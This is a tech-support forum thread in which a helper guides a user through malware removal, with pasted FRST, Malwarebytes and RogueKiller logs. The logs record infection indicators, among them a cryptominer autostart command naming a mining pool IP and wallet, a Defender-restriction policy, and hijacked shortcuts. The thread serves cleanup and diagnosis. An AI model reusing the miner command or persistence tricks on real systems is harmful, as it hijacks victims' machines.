(1) C:\Program Files\P4B69KW31G\P4B69KW31.exe
(T@@9MGBSB) C:\Program Files\9F8KN5EJ25\M4EZV4LK1.exe
(T@@9MGBSB) C:\Program Files (x86)\1cqaldhh1t4\24P9P.exe
(T@@9MGBSB) C:\Program Files\LVN8W6E40P\LVN8W6E40.exe
(LZDZ3UY) C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe
HKLM-x32\...\Run: [BOOSTER] => "C:\Users\Jpoch\AppData\Local\PCBooster\booster.exe" -o 188.42.242.221:3333 -u 49YfoE2xWHG1vywX2xTV8XZzBzB1E2QHEF9GtzPKSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C -p WORKER-64-1411 -k -o p (the data entry has 200 more characters).
HKLM\...\RunOnce: [OMEWPRODUCT_A4ZTJ] => C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE [422400 2017-11-20] (T@@9MGBSB) <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [1GTGLIO7OYX9UG4] => C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [7571555] => C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy\tgvynp5fi0z.exe [529932 2017-11-20] ( )
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [8AXDS40R0VLOMTA] => C:\Program Files\P4B69KW31G\P4B69KW31.exe [840192 2017-11-20] (1)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [ADVOFKIWWU.EXE] => C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4\ADVOFKIWWU.exe m_1 L_1 <==== ATTENTION
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [LJ3X92T3371CP84] => C:\Program Files\9F8KN5EJ25\M4EZV4LK1.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [O6FW1NSS4KFJQRH] => C:\Program Files (x86)\1cqaldhh1t4\24P9P.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [Y680XDWS6L0I742] => C:\Program Files\LVN8W6E40P\LVN8W6E40.exe [1037312 2017-11-20] (T@@9MGBSB)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\Run: [CVAWYW1XG38Q8N7] => C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe [669696 2017-11-21] (LZDZ3UY)
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\...\MountPoints2: {514308f6-a4ca-11e6-ac7b-806e6f6e6963} - "E:\setup.exe"
CHR DefaultSearchURL: Profile 1 -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Profile 1 -> hxxp://srch.bar/?s={searchTerms}
CHR Extension: (Quick Searcher v16.2) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20]
CHR Extension: (Chrome Cleaner Pro) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccjleegmemocfpghkhpjmiccjcacackp [2017-10-11]
CHR Extension: (Quick Searcher) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20]
CHR HKLM\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-3446151218-491997262-3667861278-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ccjleegmemocfpghkhpjmiccjcacackp] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ] - hxxps://clients2.google.com/service/update2/crx
S1 ZAM; \??\C:\WINDOWS\System32\drivers\zam64.sys [X]
Task: {8AE9CBEE-77EE-45AE-B980-A68EF2B5F072} - System32\Tasks\Yaminguict Explorer for ERC => C:\WINDOWS\system32\rundll32.exe "C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll",eWMujhpWxRLj <==== ATTENTION
2017-11-20 23:50 - 2017-11-20 23:50 - 002249216 _____ () C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll
2017-11-21 00:22 - 2017-11-21 00:22 - 000713216 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp
2017-11-21 00:22 - 2017-11-21 00:22 - 000013312 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\_isetup\_isdecmp.dll
2017-11-21 00:22 - 2008-10-15 16:44 - 000205312 _____ () C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\itdownload.dll
C:\Windows\System32\Tasks\Yaminguict Explorer for ERC
C:\Program Files (x86)\1cqaldhh1t4
C:\Program Files\U9K03QV4LJ
C:\Program Files\8OK3IXWMOC
C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy
C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp
C:\Program Files\P4B69KW31G
C:\Program Files\9F8KN5EJ25
C:\Program Files (x86)\1cqaldhh1t4
C:\Program Files\LVN8W6E40P
C:\Program Files\U9K03QV4LJ
C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4
 
End
*****************
 
Error: (0) Failed to create a restore point.
Processes closed successfully.
C:\Program Files (x86)\1cqaldhh1t4\U27HAQ26CPUNXEC.EXE => No running process found
C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe => No running process found
C:\Program Files\8OK3IXWMOC\8OK3IXWMO.exe => No running process found
C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy\TGVYNP5FI0Z.EXE => No running process found
C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp => No running process found
C:\Program Files\P4B69KW31G\P4B69KW31.exe => No running process found
C:\Program Files\9F8KN5EJ25\M4EZV4LK1.exe => No running process found
C:\Program Files (x86)\1cqaldhh1t4\24P9P.exe => No running process found
C:\Program Files\LVN8W6E40P\LVN8W6E40.exe => No running process found
C:\Program Files\U9K03QV4LJ\U9K03QV4L.exe => No running process found
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\BOOSTER => value not found.
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\\OMEWPRODUCT_A4ZTJ => value not found.
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => key removed successfully
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\1GTGLIO7OYX9UG4 => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\7571555 => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\8AXDS40R0VLOMTA => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\ADVOFKIWWU.EXE => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\LJ3X92T3371CP84 => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\O6FW1NSS4KFJQRH => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Y680XDWS6L0I742 => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CVAWYW1XG38Q8N7 => value not found.
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{514308f6-a4ca-11e6-ac7b-806e6f6e6963} => key removed successfully
HKLM\Software\Classes\CLSID\{514308f6-a4ca-11e6-ac7b-806e6f6e6963} => key not found. 
Chrome DefaultSearchURL => not found.
Chrome DefaultSuggestURL => not found.
CHR Extension: (Quick Searcher v16.2) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Default\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20] => Error: No automatic fix found for this entry.
CHR Extension: (Chrome Cleaner Pro) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccjleegmemocfpghkhpjmiccjcacackp [2017-10-11] => Error: No automatic fix found for this entry.
CHR Extension: (Quick Searcher) - C:\Users\Jpoch\AppData\Local\Google\Chrome\User Data\System Profile\Extensions\pbdpajcdgknpendpmecafmopknefafha [2017-11-20] => Error: No automatic fix found for this entry.
HKLM\SOFTWARE\Google\Chrome\Extensions\PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ => key not found. 
HKU\S-1-5-21-3446151218-491997262-3667861278-1001\SOFTWARE\Google\Chrome\Extensions\PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ => key not found. 
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\ccjleegmemocfpghkhpjmiccjcacackp => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\PILPLLOABDEDFMIALNFCHJOMJMPJCOEJ => key not found. 
HKLM\System\CurrentControlSet\Services\ZAM => key removed successfully
ZAM => service removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8AE9CBEE-77EE-45AE-B980-A68EF2B5F072} => key not found. 
C:\WINDOWS\System32\Tasks\Yaminguict Explorer for ERC => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Yaminguict Explorer for ERC => key not found. 
"C:\Program Files\Yaminguict Explorer for ERC\Yaminguict Explorer for ERC.dll" => not found.
C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp\TGVYNP5FI0Z.tmp => moved successfully
C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\_isetup\_isdecmp.dll => moved successfully
C:\Users\Jpoch\AppData\Local\Temp\is-1I6HS.tmp\itdownload.dll => moved successfully
"C:\Windows\System32\Tasks\Yaminguict Explorer for ERC" => not found.
"C:\Program Files (x86)\1cqaldhh1t4" => not found.
"C:\Program Files\U9K03QV4LJ" => not found.
"C:\Program Files\8OK3IXWMOC" => not found.
C:\Users\Jpoch\AppData\Roaming\vnp350ll0wy => moved successfully
C:\Users\Jpoch\AppData\Local\Temp\is-4A2QI.tmp => moved successfully
"C:\Program Files\P4B69KW31G" => not found.
"C:\Program Files\9F8KN5EJ25" => not found.
"C:\Program Files (x86)\1cqaldhh1t4" => not found.
"C:\Program Files\LVN8W6E40P" => not found.
"C:\Program Files\U9K03QV4LJ" => not found.
"C:\Users\Jpoch\AppData\Local\Temp\dd-37146-936-f9988-201d17ce4a2e4" => not found.
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 11034624 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 89279255 B
Java, Flash, Steam htmlcache => 265079481 B
Windows/system/drivers => 3960247 B
Edge => 128956344 B
Chrome => 604948949 B
Firefox => 423509432 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 24782 B
NetworkService => 0 B
defaultuser0 => 0 B
Jpoch => 5266174446 B
 
RecycleBin => 101043051 B
EmptyTemp: => 6.4 GB temporary data Removed.
 
================================
 
 
The system needed a reboot.
 
==== End of Fixlog 12:28:35 ====
 
 
Malwarebytes
www.malwarebytes.com
 
-Log Details-
Scan Date: 11/21/17
Scan Time: 12:38 PM
Log File: e4caa628-cefb-11e7-bad9-7824af45e1c2.json
Administrator: Yes
 
-Software Information-
Version: 3.3.1.2183
Components Version: 1.0.236
Update Package Version: 1.0.3314
License: Trial
 
-System Information-
OS: Windows 10 (Build 15063.726)
CPU: x64
File System: NTFS
User: DESKTOP-52F4FGA\Jpoch
 
-Scan Summary-
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 459538
Threats Detected: 0
(No malicious items detected)
Threats Quarantined: 0
(No malicious items detected)
Time Elapsed: 2 min, 40 sec
 
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
 
-Scan Details-
Process: 0
(No malicious items detected)
 
Module: 0
(No malicious items detected)
 
Registry Key: 0
(No malicious items detected)
 
Registry Value: 0
(No malicious items detected)
 
Registry Data: 0
(No malicious items detected)
 
Data Stream: 0
(No malicious items detected)
 
Folder: 0
(No malicious items detected)
 
File: 0
(No malicious items detected)
 
Physical Sector: 0
(No malicious items detected)
 
 
(end)


#4 nasdaq

nasdaq

  • Malware Response Team
  • 40,238 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:04:33 AM

Posted 22 November 2017 - 07:54 AM



system restore turned on (thank you for that, no clue how it was even turned off)


Is the Restore point it still ON?

None were created when you did the Fix.
Error: (0) Failed to create a restore point.

Was it turn ON after the fix?
===

There was a lot of crap found. Run this program to make sure no Rootkit was installed.

Run this Malwarebytes Anti-Rootkit.

Follow the instructions in the thread below. Make sure to download the MBAR linked in it. Let me know if you're not able to launch it and run a scan.

https://forums.malwarebytes.com/topic/198907-requested-resource-is-in-use-error-unable-to-start-malwarebytes/

Before you run the program make sure you follow the instructions under Section 5.
5. Unselect sectors and system below. Hit the scan button.

If you manage to run a scan, delete everything it finds, and then copy/paste the content of the "mbar-log-TODAY'S-DATE.txt" log that is located in the MBAR folder here after.
<<<>>>

3rd party Search bar are not recommended. Use the default Chrome search.

For special search use this.
https://www.google.com/advanced_search

===

but I kept getting pop ups that would bring the screen up front and would disrupt what I was doing - had to do something)

Let me know if this is still a problem.

#5 Description

Description
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:03:33 AM

Posted 23 November 2017 - 07:30 PM

I apologize for the delay, busy thanksgiving!

 

I didn't turn it off, so something must be turning it off, or maybe memory but I didn't see any warning or error of such issue.

 

I also don't think I use a 3rd party search bar so that must have been added as well. Like I said, chrome won't even show up in the start so I'm not even sure what is loading when I use the Chrome run command that pops up. Same thing with firefox, when I search it the only thing that pops up is an installer for firefox, which I have to do to get it to work. It will still load my previous pages, so I'm not sure what the deal is with those.

The pop ups have been fine since we ran the malwarebytes scan .

 

Ran the mbar, unselected both Sectors, and system. It said it found nothing, but here is the result.

 

Malwarebytes Anti-Rootkit BETA 1.10.3.1001
www.malwarebytes.org
 
Database version:
  main:    v2017.11.23.10
  rootkit: v2017.10.14.01
 
Windows 10 x64 NTFS
Internet Explorer 11.726.15063.0
Jpoch :: DESKTOP-52F4FGA [administrator]
 
11/23/2017 4:28:30 PM
mbar-log-2017-11-23 (16-28-30).txt
 
Scan type: 
Scan options enabled: Anti-Rootkit | Drivers | MBR
Scan options disabled: Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Objects scanned: 91
Time elapsed: 14 second(s)
 
Memory Processes Detected: 0
(No malicious items detected)
 
Memory Modules Detected: 0
(No malicious items detected)
 
Registry Keys Detected: 0
(No malicious items detected)
 
Registry Values Detected: 0
(No malicious items detected)
 
Registry Data Items Detected: 0
(No malicious items detected)
 
Folders Detected: 0
(No malicious items detected)
 
Files Detected: 0
(No malicious items detected)
 
Physical Sectors Detected: 0
(No malicious items detected)
 
(end)


#6 nasdaq

nasdaq

  • Malware Response Team
  • 40,238 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Montreal, QC. Canada
  • Local time:04:33 AM

Posted 24 November 2017 - 07:53 AM

Hi,

--RogueKiller--
  • Download & SAVE to your Desktop Download RogueKiller
  • Quit all programs that you may have started.
  • Please disconnect any USB or external drives from the computer before you run this scan!
  • For Vista or above, right-click the program file and select "Run as Administrator"
  • Accept the user agreements.
  • Execute the scan and wait until it has finished.
  • If a Windows opens to explain what [PUM's] are, read about it.
  • Click the RoguKiller icon on your taksbar to return to the report.
  • Click open the Report
  • Click Export TXT button
  • Save the file as ReportRogue.txt
  • Click the Remove button to delete the items in RED
  • Click Finish and close the program.
  • Locate the ReportRogue.txt file on your Desktop and copy/paste the contents in your next.
=======

Temporarily disable your AV program so it does not interfere.
Info on how to disable your security applications How To Temporarily Disable Your Anti-virus, Firewall And Anti-malware Programs - Security Mini-Guides.

Download Zoek tool from here

When the download appears, save to the Desktop.
On the Desktop, right-click the Zoek.exe file and select: Run as Administrator
(Give it a few seconds to appear.)

Next, copy/paste the entire script inside the code box below to the input field of Zoek:
createsrpoint;
autoclean;
emptyclsid;
emptyffcache;
FFdefaults;
emptyiecache;
iedefaults;
emptychrcache;
CHRdefaults;
emptyalltemp;
emptyfolderscheck;delete
ipconfig /flushdns;b
Now...
Close any open Browsers.
Click the Run script button, and wait. It takes a few minutes to run all the script.

When the tool finishes, the zoek-results.log is opened in Notepad.
The log is also found on the systemdrive, normally C:\
If a reboot is needed, the log is opened after the reboot.

Please attach the zoek-results.log in your reply.
===

If Chrome is still acting up remove and reinstall it
Follow these instructions.

:step1: Remove Chrome from your Computer and reinstall a fresh copy later.

:step2: Before you remove Chrome Export your Bookmarks
Chrome will export your bookmarks as a HTML file, which you can then import into another browser.

How To: http://ccm.net/faq/31791-how-to-backup-your-google-chrome-bookmarks

:step3: If you sync you account you must remove it before you save your bookmarks etc...
Delete Your Google Chrome Browser Sync Data
https://www.howtogeek.com/103655/how-to-delete-your-google-chrome-browser-sync-data/


:step4: Clear your Chrome cache and cookies
https://support.google.com/chromebook/answer/183083?hl=en


:step5: Remove Chrome using the the instructions on this page.
https://support.google.com/chrome/answer/95319?hl=en

:step6: Re-install Chrome and the Bookmarks.
====

Syncing issue.
To remove this you will possibly have to reset the Sync in Chrome.

Read this article and proceed.

Chrome Secure Preferences detection always comes back
https://forums.malwarebytes.com/topic/214325-chrome-secure-preferences-detection-always-comes-back/
<<<>>>

Also, please provide an update on how the computer is behaving.

===

#7 Description

Description
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:03:33 AM

Posted 24 November 2017 - 05:23 PM

I ran RogueKiller the other day I do believe and that was what helped with the pop ups.

I'll post the old scan, along with the new one below (showed nothing on the newer scan)

looks like there is 3 total, I do apologize for the excess of scans for it but i want to make sure you have all the info, and wasn't sure if the scan or delete log is what you needed. For some reason when I saved it like you asked, it didn't show up on my desktop and couldn't find the file name with a search. Let me know if you need me to redo the scan

 

 

 

Scan #1

 

RogueKiller V12.11.25.0 (x64) [Nov 20 2017] (Free) by Adlice Software
 
Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : Jpoch [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Scan -- Date : 11/20/2017 21:08:54 (Duration : 00:16:24)
Switches : -refid
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 4 ¤¤¤
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Internet Explorer\Main | Start Page :
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Internet Explorer\Main | Start Page :
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {5A5CBD99-8B90-47B6-8DE9-EEEFCA4ABC18} : v2.27|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=D:\vindictus\appdata\en-US\NMService.exe|Name=Nexon Messenger Core| [7] -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {8DA09001-13CD-4F60-A499-697A1D88A246} : v2.27|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Private|App=D:\vindictus\appdata\en-US\NMService.exe|Name=Nexon Messenger Core| [7] -> Found
 
¤¤¤ Tasks : 1 ¤¤¤
[PUP.Gen1] \ACC -- C:\Program Files\DriverSetupUtility\FUB\FUB_Send.bat -> Found
 
¤¤¤ Files : 30 ¤¤¤
[PUP.Gen0][File] C:\Users\Public\Desktop\G??gl? Chrom?.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\W?rld ?f War?r?ft.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual tfarcraw fo dlrow.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\?attl?.n?t.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual ten.elttab.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\?ozilla Firef??.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.xoferif.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\?ath ?f Di?blo Launcher.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual olbaid fo htap.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\Run?Sc?pe.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\?U_L?GEND.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualzw.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Int?rnet ??pl?r?r.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.erolpxei.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon\Vindi?tus.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual_noxen.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RuneScape\Run?Sca?e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Run?S???e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\G??gle Chr?me.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\G?ogl? Chrome.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Found
[PUP.OnlineIO|PUP.Gen1][Folder] C:\Users\Jpoch\AppData\Roaming\AGData -> Found
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net\?attl?.n?t.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual ten.elttab.bat -> Found
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\G?ogl? ?hrome.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Found
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MU LEGEND GLOBAL\?U LEGEND GLO?AL.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualzw.bat -> Found
[PUP.Gen0][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\World of Warcraft\W?rld ?f W?rcr?ft.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual tfarcraw fo dlrow.bat -> Found
[PUP.Gen0][File] C:\$RECYCLE.BIN\S-1-5-21-3446151218-491997262-3667861278-1001\$RUYU978\??th of Diablo Laun?h?r.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual olbaid fo htap.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\Run?Sc?pe.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\Desktop\?U_L?GEND.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualzw.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\G??gl? Chrom?.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.emorhc.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\W?rld ?f War?r?ft.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual tfarcraw fo dlrow.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\?attl?.n?t.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual ten.elttab.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\?ozilla Firef??.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.xoferif.bat -> Found
[PUP.Gen0][File] C:\Users\Public\Desktop\?ath ?f Di?blo Launcher.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual olbaid fo htap.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Int?rnet ??pl?r?r.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.erolpxei.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Nexon\Vindi?tus.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnual_noxen.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\RuneScape\Run?Sca?e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Found
[PUP.Gen0][File] C:\Users\Jpoch\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Run?S???e.lnk [LNK@] C:\Users\Jpoch\AppData\Roaming\Browsers\exe.rehcnualxegaj.bat -> Found
 
¤¤¤ WMI : 0 ¤¤¤
 
¤¤¤ Hosts File : 0 ¤¤¤
 
¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤
 
¤¤¤ Web browsers : 0 ¤¤¤
 
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD10EZEX-60M2NA0 +++++
--- User ---
[MBR] ddaa32bb8d2d1edee03613fab80d2fe3
[BSP] a07e8b3550ee83d9c7c223cf1cd7f92c : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 953867 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK
 
+++++ PhysicalDrive1: ADATA SP610 +++++
--- User ---
[MBR] 2bf09fd3323152756de5db48f7a40a8e
[BSP] 79622432022f49b832f926bf0763e6dd : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 350 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 718848 | Size: 121302 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] ACER (0x27) [VISIBLE] Offset (sectors): 249145344 | Size: 450 MB
User = LL1 ... OK
User = LL2 ... OK
 
Delete #1
 
RogueKiller V12.11.25.0 (x64) [Nov 20 2017] (Free) by Adlice Software
 
Operating System : Windows 10 (10.0.15063) 64 bits version
Started in : Normal mode
User : Jpoch [Administrator]
Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
Mode : Delete -- Date : 11/20/2017 21:08:54 (Duration : 00:16:24)
Switches : -refid
 
¤¤¤ Processes : 0 ¤¤¤
 
¤¤¤ Registry : 4 ¤¤¤
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Internet Explorer\Main | Start Page :
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-3446151218-491997262-3667861278-1001\Software\Microsoft\Internet Explorer\Main | Start Page :
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {5A5CBD99-8B90-47B6-8DE9-EEEFCA4ABC18} : v2.27|Action=Allow|Active=TRUE|Dir=In|Protocol=6|Profile=Private|App=D:\vindictus\appdata\en-US\NMService.exe|Name=Nexon Messenger Core| [7] -> Deleted
